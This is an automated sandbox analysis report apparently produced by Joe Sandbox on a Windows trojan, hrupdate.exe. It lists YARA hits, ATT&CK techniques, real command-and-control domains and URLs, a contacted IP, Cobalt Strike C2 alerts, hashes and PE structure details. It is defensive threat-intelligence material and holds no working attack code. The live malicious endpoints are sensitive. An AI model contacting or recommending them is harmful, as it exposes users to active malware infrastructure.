      Source: Yara matchFile source: 00000000.00000003.2236236442.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.2872941960.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: hrupdate.exe PID: 7428, type: MEMORYSTR
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FCC481 htonl,htons,socket,closesocket,bind,ioctlsocket,0_2_04FCC481
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FD3FA4 socket,closesocket,htons,bind,listen,0_2_04FD3FA4
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FCC39F socket,htons,ioctlsocket,closesocket,bind,listen,0_2_04FCC39F

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire Infrastructure2
      Valid Accounts      		2
      Command and Scripting Interpreter      		2
      Valid Accounts      		2
      Valid Accounts      		2
      Valid Accounts      		OS Credential Dumping1
      System Time Discovery      		Remote Services1
      Archive Collected Data      		21
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts3
      Native API      		1
      DLL Side-Loading      		21
      Access Token Manipulation      		1
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Query Registry      		Remote Desktop ProtocolData from Removable Media4
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      Process Injection      		21
      Access Token Manipulation      		Security Account Manager131
      Security Software Discovery      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
      DLL Side-Loading      		1
      Process Injection      		NTDS1
      Virtualization/Sandbox Evasion      		Distributed Component Object ModelInput Capture114
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information      		LSA Secrets1
      Process Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain Credentials1
      Account Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
      System Owner/User Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
      File and Directory Discovery      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow24
      System Information Discovery      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      hrupdate.exe3%ReversingLabs
      hrupdate.exe100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      ec2-3-79-209-76.eu-central-1.compute.amazonaws.com
      		3.79.209.76
      		truetrue
        		unknown
        www.hrtraining.ro
        		unknown
        		unknowntrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          www.hrtraining.rotrue
            		unknown
            https://www.flntp.ro/rss/portallogin-gettask.htmltrue
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://www.hrtraining.ro/:D2hrupdate.exe, 00000000.00000003.1920601227.0000000005DCC000.00000004.00000800.00020000.00000000.sdmpfalse
                		unknown
                https://www.hrtraining.ro/rss/portallogin-gettask.html&X2hrupdate.exe, 00000000.00000003.2010673279.0000000005DE8000.00000004.00000800.00020000.00000000.sdmpfalse
                  		unknown
                  http://www.hrtraining.ro/trainingcheck_v5498dummyhttp://www.hrtraining.ro/trakingu/invalidhrupdate.exefalse
                    		unknown
                    https://www.hrtraining.ro/rss/portallogin-gettask.htmlwhrupdate.exe, 00000000.00000003.1854632916.00000000012AE000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      https://www.hrtraining.ro/ss/portallogin-gettask.htmlhrupdate.exe, 00000000.00000003.1920601227.0000000005DCC000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        http://www.hrtraining.ro/trakingu/hrupdate.exefalse
                          		unknown
                          https://www.hrtraining.ro/rss/portallogin-gettask.htmlahrupdate.exe, 00000000.00000003.2010673279.0000000005DE8000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            http://www.hrtraining.ro/trainingcheck_v5498bhrupdate.exe, 00000000.00000002.2943524353.0000000004C6C000.00000004.00000010.00020000.00000000.sdmpfalse
                              		unknown
                              https://www.hrtraining.ro/rss/portallogin-gettask.htmlghrupdate.exe, 00000000.00000003.1920557369.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.1854632916.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.1942656539.00000000012AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://www.hrtraining.ro/trainingcheck_v5498hrupdate.exefalse
                                  		unknown
                                  http://www.hrtraining.ro/trakingu/useruserhrupdate.exe, 00000000.00000002.2942801537.00000000010FB000.00000004.00000010.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://www.hrtraining.ro/rss/portallogin-gettask.html=E3&hrupdate.exe, 00000000.00000003.1920601227.0000000005DCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://www.hrtraining.ro/Rhrupdate.exe, 00000000.00000002.2942922670.0000000001289000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://www.hrtraining.ro/rss/portallogin-gettask.html03hrupdate.exe, 00000000.00000003.2672690716.0000000005DE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://www.hrtraining.ro/hrupdate.exe, 00000000.00000003.1920601227.0000000005DCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://www.hrtraining.ro/rss/portallogin-gettask.htmlhrupdate.exe, 00000000.00000002.2943907526.0000000005DC0000.00000004.00000800.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.2672627647.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.1920601227.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000002.2942922670.00000000012AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://www.hrtraining.ro/rss/portallogin-gettask.html:D2hrupdate.exe, 00000000.00000002.2943907526.0000000005DC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://www.hrtraining.ro/rss/portallogin-gettask.htmlPhrupdate.exe, 00000000.00000002.2942922670.000000000124E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://www.hrtraining.ro/rss/portallogin-gettask.htmlp2hrupdate.exe, 00000000.00000003.2166521732.0000000005DE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://www.hrtraining.ro/trakingu/userhrupdate.exe, 00000000.00000002.2942801537.00000000010FB000.00000004.00000010.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://www.hrtraining.ro/rss/portallogin-gettask.htmlAhrupdate.exe, 00000000.00000002.2942922670.000000000124E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://www.hrtraining.ro/training.ro/rss/portallogin-gettask.htmlQGhrupdate.exe, 00000000.00000002.2943907526.0000000005DC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://www.hrtraining.ro/rss/portallogin-gettask.htmloDhrupdate.exe, 00000000.00000002.2943907526.0000000005DC0000.00000004.00000800.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.1920601227.0000000005DCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://www.hrtraining.ro/rss/portallogin-gettask.html=hrupdate.exe, 00000000.00000003.2010673279.0000000005DE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              3.79.209.76
                                                              		ec2-3-79-209-76.eu-central-1.compute.amazonaws.comUnited States
                                                              		16509AMAZON-02UStrue

                                                              General Information

                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1578569
                                                              Start date and time:2024-12-19 22:39:08 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 4m 58s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:5
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:hrupdate.exe
                                                              Detection:MAL
                                                              Classification:mal96.troj.evad.winEXE@1/0@2/1
                                                              EGA Information:
                                                              • Successful, ratio: 100%
                                                              HCA Information:
                                                              • Successful, ratio: 93%
                                                              • Number of executed functions: 31
                                                              • Number of non-executed functions: 82
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                              • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              • VT rate limit hit for: hrupdate.exe

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              16:40:03API Interceptor54x Sleep call for process: hrupdate.exe modified
                                                              21:39:53Task SchedulerRun new task: {166D16CE-8744-4823-815F-D360B45E3A5C} path:

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              No context

                                                              Domains

                                                              No context

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              AMAZON-02UShttps://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4aGet hashmaliciousHTMLPhisherBrowse
                                                              • 75.2.57.54
                                                              https://gateway.lighthouse.storage/ipfs/bafkreigjxudfsi54f5pliswxztgujxgpdhe4uyrezdbg5avbtrclxrxc6iGet hashmaliciousHTMLPhisherBrowse
                                                              • 13.227.8.71
                                                              https://launch.app/prolandtitleGet hashmaliciousHTMLPhisherBrowse
                                                              • 76.76.21.21
                                                              Employee_Letter.PDFuJPefyDW1j.urlGet hashmaliciousUnknownBrowse
                                                              • 13.227.8.47
                                                              mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                              • 3.165.3.192
                                                              6CWcISKhf1.msiGet hashmaliciousAteraAgentBrowse
                                                              • 13.232.67.198
                                                              https://go.eu.sparkpostmail1.com/f/a/lgobNkIfvQXGgmbryxpFvQ~~/AAGCxAA~/RgRpPCorP0QoaHR0cHM6Ly9iZXJhemVsLmNvbS93ZWxsbmVzcy9zb3V0aC9pbmRleFcFc3BjZXVCCmdVK6VZZ3GvOmFSFmV0aGFubG9nYW40M0BnbWFpbC5jb21YBAAAAAE~#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                              • 13.227.8.65
                                                              spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                              • 18.217.199.157
                                                              x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                                              • 65.3.229.89
                                                              https://gmail.net-login.com/Xb1Rnb3pKRC9CUEdpbldIVTREbHhIK1Vza1NvaWlrblBIbkN4aUdCZUt0Y2NlSGJiWmZ2d0M1dTB5dEpRbnRoVDdBVkFTcEJqWGowNVZycWJNWHlIUHlLOG1qS0FvemVPSXpFRFhGcUhmaVU1ekQwMklrVmM0QjVpNmhLaDdoY1I4UlhMcFo1TTJaSFhtaWpiWWFqWGZ5WEg4TnBiOUl4MDI1RFMyWStQRFoyNFo5UFZNUUpmWXBtaUg0Y0FjUG1jejdSVnFVOXJQL2VzdmNLM1lEaWtmRkZnZEk2Vi0tVHFIeU0vOWxTN01YVEtXbS0tTTh5Skh1eEtsc0xTT0J5Rzg2Q2ZJQT09?cid=2330416057%3EOpenGet hashmaliciousKnowBe4Browse
                                                              • 52.217.121.192

                                                              JA3 Fingerprints

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              37f463bf4616ecd445d4a1937da06e19billys.exeGet hashmaliciousMeduza StealerBrowse
                                                              • 3.79.209.76
                                                              ruppert.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                              • 3.79.209.76
                                                              file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                              • 3.79.209.76
                                                              2JSGOlbNym.dllGet hashmaliciousUnknownBrowse
                                                              • 3.79.209.76
                                                              4hSuRTwnWJ.dllGet hashmaliciousUnknownBrowse
                                                              • 3.79.209.76
                                                              QCTYoyX422.dllGet hashmaliciousUnknownBrowse
                                                              • 3.79.209.76
                                                              PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                              • 3.79.209.76
                                                              PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                              • 3.79.209.76
                                                              INVOICE-0098.pdf ... .lnk.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                              • 3.79.209.76
                                                              YinLHGpoX4.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                              • 3.79.209.76

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              No created / dropped files found

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Entropy (8bit):4.407559158089781
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:hrupdate.exe
                                                              File size:244'224 bytes
                                                              MD5:03b14e9338a1c9e5551f9450207f6d84
                                                              SHA1:f1a816c47637c8d4d0b52b333cba11b0d7571fcb
                                                              SHA256:7a4d2b3e83220df7a55944a838bb9ebaa8f8463cff62fa92ae10e640eeb4e498
                                                              SHA512:2c51fc5272e24ef43d770c7a6ac30252bcd408878405d2f1cf63327a05e497fd6e5fabc54a328ece7c4abe2ee4b1fcd8e9c03cb03bd6d5f0b2d7d6c87848b946
                                                              SSDEEP:1536:MUth9KcBb/v5D8gCHqoPXDO4YcPJnWQyz9999Uh:MUtXNVD8gCPD3L
                                                              TLSH:0C343B43569D7C92CC3C1B38237B97DB832EBE7578C5E08EB9803E9692BD0923512795
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<...].V.].V.].V.%$V.].V.5.W.].V.5.W.].V.5.W.].V.5.W.].V...W.].V.].V:].V$4.W.].V$4HV.].V.] V.].V$4.W.].VRich.].V........PE..L..

                                                              File Icon

                                                              Icon Hash:17170f6d2b2d2d13

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x40307a
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x672B2266 [Wed Nov 6 08:01:42 2024 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:6
                                                              OS Version Minor:0
                                                              File Version Major:6
                                                              File Version Minor:0
                                                              Subsystem Version Major:6
                                                              Subsystem Version Minor:0
                                                              Import Hash:40fa9cd20812bab5129ef85091bfbdac

                                                              Entrypoint Preview

                                                              Instruction
                                                              call 00007FDB744FB601h
                                                              jmp 00007FDB744FAF6Fh
                                                              push ebp
                                                              mov ebp, esp
                                                              push 00000000h
                                                              call dword ptr [00404038h]
                                                              push dword ptr [ebp+08h]
                                                              call dword ptr [0040406Ch]
                                                              push C0000409h
                                                              call dword ptr [00404034h]
                                                              push eax
                                                              call dword ptr [0040403Ch]
                                                              pop ebp
                                                              ret
                                                              push ebp
                                                              mov ebp, esp
                                                              sub esp, 00000324h
                                                              push 00000017h
                                                              call 00007FDB744FBBAAh
                                                              test eax, eax
                                                              je 00007FDB744FB0F7h
                                                              push 00000002h
                                                              pop ecx
                                                              int 29h
                                                              mov dword ptr [00406330h], eax
                                                              mov dword ptr [0040632Ch], ecx
                                                              mov dword ptr [00406328h], edx
                                                              mov dword ptr [00406324h], ebx
                                                              mov dword ptr [00406320h], esi
                                                              mov dword ptr [0040631Ch], edi
                                                              mov word ptr [00406348h], ss
                                                              mov word ptr [0040633Ch], cs
                                                              mov word ptr [00406318h], ds
                                                              mov word ptr [00406314h], es
                                                              mov word ptr [00406310h], fs
                                                              mov word ptr [0040630Ch], gs
                                                              pushfd
                                                              pop dword ptr [00406340h]
                                                              mov eax, dword ptr [ebp+00h]
                                                              mov dword ptr [00406334h], eax
                                                              mov eax, dword ptr [ebp+04h]
                                                              mov dword ptr [00406338h], eax
                                                              lea eax, dword ptr [ebp+08h]
                                                              mov dword ptr [00406344h], eax
                                                              mov eax, dword ptr [ebp-00000324h]
                                                              mov dword ptr [00406280h], 00010001h

                                                              Rich Headers

                                                              Programming Language:
                                                              • [IMP] VS2008 SP1 build 30729

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x4d0c0x140.rdata
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x70000x361b8.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x3e0000x400.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x44500x70.rdata
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x44c00x40.rdata
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x40000x230.rdata
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x10000x2ecb0x30005d06f4206746907c833a2481f65088c1False0.5750325520833334COM executable for DOS6.300274659901053IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rdata0x40000x1a080x1c001e97f3d49e555f25c36fe5d37cfead01False0.39620535714285715data4.65454105213308IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .data0x60000x7380x4002ceacc7ad5a855df52932a54a33adc4dFalse0.259765625data3.3218316032948274IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .rsrc0x70000x361b80x3620074bdbba1f539597c017848daa85523b5False0.14270893475750576data4.0626831582612635IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .reloc0x3e0000x4000x400b6b1b20025ba3ae165aea709cabb8ef5False0.912109375data6.464420599581639IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                              Resources

                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_BITMAP0x1e1700x1ed70Device independent bitmap graphic, 205 x 205 x 24, image size 126280, resolution 2835 x 2835 px/mEnglishUnited States0.1544094363521216
                                                              RT_ICON0x75e00x115aPNG image data, 256 x 256, 8-bit colormap, non-interlacedEnglishUnited States0.33340837460603334
                                                              RT_ICON0x87400xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.09408315565031983
                                                              RT_ICON0x95e80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.11507220216606498
                                                              RT_ICON0x9e900x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.12427745664739884
                                                              RT_ICON0xa3f80x90bPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.791792656587473
                                                              RT_ICON0xad080x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.03235710911667454
                                                              RT_ICON0xef300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.04595435684647303
                                                              RT_ICON0x114d80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.075046904315197
                                                              RT_ICON0x125800x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.15070921985815602
                                                              RT_ICON0x12a700x115aPNG image data, 256 x 256, 8-bit colormap, non-interlacedEnglishUnited States0.33340837460603334
                                                              RT_ICON0x13bd00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.09408315565031983
                                                              RT_ICON0x14a780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.11507220216606498
                                                              RT_ICON0x153200x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.12427745664739884
                                                              RT_ICON0x158880x90bPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.791792656587473
                                                              RT_ICON0x161980x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.03235710911667454
                                                              RT_ICON0x1a3c00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.04595435684647303
                                                              RT_ICON0x1c9680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.075046904315197
                                                              RT_ICON0x1da100x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.15070921985815602
                                                              RT_MENU0x1df000x4adataEnglishUnited States0.8648648648648649
                                                              RT_DIALOG0x1df600x100dataEnglishUnited States0.62890625
                                                              RT_DIALOG0x1e0600x10cdataEnglishUnited States0.6492537313432836
                                                              RT_STRING0x3cee00x50dataEnglishUnited States0.75
                                                              RT_ACCELERATOR0x1df500x10dataEnglishUnited States1.25
                                                              RT_GROUP_ICON0x129e80x84dataEnglishUnited States0.6590909090909091
                                                              RT_GROUP_ICON0x1de780x84dataEnglishUnited States0.6515151515151515
                                                              RT_MANIFEST0x3cf300x286XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5479876160990712

                                                              Imports

                                                              DLLImport
                                                              KERNEL32.dllFlsSetValue, CreateFileA, CloseHandle, K32GetModuleInformation, GetModuleHandleA, GetConsoleWindow, lstrcpyW, CreateFileMappingW, MapViewOfFile, GetCurrentProcess, SetUnhandledExceptionFilter, TerminateProcess, FreeLibrary, VirtualAlloc, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, UnhandledExceptionFilter, FlsAlloc, VirtualProtect
                                                              USER32.dllShowWindow, LoadStringW, RegisterClassExW, GetMessageW, DefWindowProcW, DestroyWindow, CreateWindowExW, SendMessageW, EndDialog, DispatchMessageW, EndPaint, BeginPaint, SetTimer, TranslateAcceleratorW, TranslateMessage, LoadIconW, LoadCursorW, GetDlgItem, UpdateWindow, KillTimer, PostQuitMessage, DialogBoxParamW, LoadAcceleratorsW
                                                              ADVAPI32.dllGetUserNameW
                                                              SHELL32.dllShell_NotifyIconW
                                                              MSVCP140.dll_Mtx_destroy, _Mtx_unlock, _Cnd_init, _Query_perf_frequency, _Xtime_get_ticks, _Thrd_detach, _Query_perf_counter, _Thrd_start, _Mtx_init, _Cnd_wait, _Thrd_sleep, _Cnd_destroy, _Cnd_signal, _Cnd_do_broadcast_at_thread_exit, ?_Throw_Cpp_error@std@@YAXH@Z, ?_Xout_of_range@std@@YAXPBD@Z, ?_Xbad_function_call@std@@YAXXZ, ?_Throw_C_error@std@@YAXH@Z, ?_Xlength_error@std@@YAXPBD@Z, _Mtx_lock
                                                              WS2_32.dllWSACleanup, recv, htons, gethostbyname, WSAStartup, inet_addr, gethostbyaddr, send, socket, connect, closesocket
                                                              CRYPT32.dllCertEnumSystemStore
                                                              VCRUNTIME140.dll__CxxFrameHandler3, __std_terminate, strstr, __std_exception_copy, memchr, _CxxThrowException, memset, _except_handler4_common, memcpy, __std_exception_destroy, memmove
                                                              api-ms-win-crt-heap-l1-1-0.dllrealloc, malloc, _callnewh, free, _set_new_mode
                                                              api-ms-win-crt-string-l1-1-0.dllstrncat, strncpy
                                                              api-ms-win-crt-runtime-l1-1-0.dll_configure_wide_argv, _register_onexit_function, _cexit, _crt_atexit, _controlfp_s, _c_exit, _set_app_type, _seh_filter_exe, _exit, exit, _register_thread_local_exe_atexit_callback, _initterm, _initterm_e, _invalid_parameter_noinfo_noreturn, _get_wide_winmain_command_line, _initialize_onexit_table, _initialize_wide_environment, terminate
                                                              api-ms-win-crt-stdio-l1-1-0.dll__stdio_common_vsprintf, _set_fmode, __p__commode
                                                              api-ms-win-crt-convert-l1-1-0.dllwcstombs_s
                                                              api-ms-win-crt-math-l1-1-0.dll__setusermatherr
                                                              api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale

                                                              Possible Origin

                                                              Language of compilation systemCountry where language is spokenMap
                                                              EnglishUnited States

                                                              Network Behavior

                                                              Suricata IDS Alerts

                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                              2024-12-19T22:40:04.711841+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.4497303.79.209.7680TCP
                                                              2024-12-19T22:40:06.615659+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.4497313.79.209.7680TCP
                                                              2024-12-19T22:40:10.184763+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449732TCP
                                                              2024-12-19T22:40:12.460101+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449733TCP
                                                              2024-12-19T22:40:14.719895+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449734TCP
                                                              2024-12-19T22:40:16.946092+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449735TCP
